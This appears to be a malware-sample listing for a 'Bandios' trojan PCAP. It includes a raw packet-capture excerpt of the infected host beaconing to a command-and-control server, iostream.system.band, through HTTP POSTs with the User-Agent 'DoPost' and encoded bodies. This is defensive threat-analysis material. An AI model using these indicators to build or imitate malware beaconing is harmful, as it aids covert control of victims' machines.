Text Example

Bandios Malware PCAP File Download Traffic Sample Trojan User-Agent DoPost

    Date added: May 24, 2019 12:02 am Added by: admin File size: 2 MB Downloads: 32

https://www.hybrid-analysis.com/sample/bd43289d2e616c78c9d5807b6c2f57028cd3d23aebc4111d7d689493b8c8c87a?environmentId=120

2018-03-23 04:45:31.046592 IP 192.168.100.237.49271 > 104.28.21.204.80: Flags [P.], seq 1:315, ack 1, win 16626, length 314: HTTP: POST /dump/io/time.php HTTP/1.1
E..b..@…Uw..d.h….w.PD7i.&.c.P.@.K…POST /dump/io/time.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: DoPost
Host: iostream.system.band
Content-Length: 136
Cache-Control: no-cache

A69FDDB2x7C2BrxvzjQ8OZMTbsB5t+gO+NmRXT9UyY4En+k8fKIMGya/Vpkm6fLyBpEg796OZbpuW6MWp4XLDz5H0Qf/N3iRp7u3PoFDZG2a6ixbG9/r+DODqsq2cgARtZcVkCXV
2018-03-23 04:45:31.075091 IP 104.28.21.204.80 > 192.168.100.237.49271: Flags [.], ack 315, win 134, length 0
E..(..@.?…h…..d..P.w&.c.D7j<P….K..

2018-03-23 04:45:31.132160 IP6 fe80::d459:17ea:b3ed:3d86.59450 > ff02::1:3.5355: UDP, length 22

2018-03-23 04:46:57.833513 IP 192.168.100.237.49816 > 104.28.20.204.80: Flags [.], ack 1, win 16626, length 0
E..(._@…W…d.h……P..A.A..P.@.:u..
2018-03-23 04:46:57.833576 IP 192.168.100.237.49816 > 104.28.20.204.80: Flags [P.], seq 1:318, ack 1, win 16626, length 317: HTTP: POST /dump/io/weather.php HTTP/1.1
E..e.@…V…d.h……P`..A.A..P.@.4…POST /dump/io/weather.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: DoPost
Host: iostream.system.band
Content-Length: 136
Cache-Control: no-cache

29B71CBFfgeSYbPn5e/OAo6DOsp5nCrnb87b3PUMhbFp67pEFSiiF+t6oO+DraoJIXS0ZJNV8DU8Gz2WWMLhip2s4t2AfKY1LjyyRnnA7CTQQjTUEmOIc5j5h2C4B2bme2VRpIzi
2018-03-23 04:46:57.836529 IP6 fe80::d459:17ea:b3ed:3d86.58034 > ff02::1:3.5355: UDP, length 22
`…………….Y….=…………………….;0………..wpad…..

2018-03-23 04:46:57.836779 IP 192.168.100.237.59265 > 224.0.0.252.5355: UDP, length 22

2018-03-23 04:46:58.666540 IP 192.168.100.237.49829 > 104.28.20.204.80: Flags [.], ack 1, win 16626, length 0
E..(.h@…W…d.h……P.af1 .3lP.@..]..
2018-03-23 04:46:58.666639 IP 192.168.100.237.49829 > 104.28.20.204.80: Flags [P.], seq 1:380, ack 1, win 16626, length 379: HTTP: POST /dump/io/weather.php HTTP/1.1
E….i@…Vn..d.h……P.af1 .3lP.@.l…POST /dump/io/weather.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: DoPost
Host: iostream.system.band
Content-Length: 136
Cache-Control: no-cache
Cookie: __cfduid=df151adf43220521b3461fff9a74fa80a1521794817

4AA096BF7Bk/JrBtXdTT9NpC+mi03QZJcX1D9ZvN3lniBR5cifCwAqYQs7dzJymBuF2W8MfZHyH1bvK9kMHYtoqWtek46DiERnyKQwi/yB6KSlZFP33F03qtXPPAIky30s8djIXX
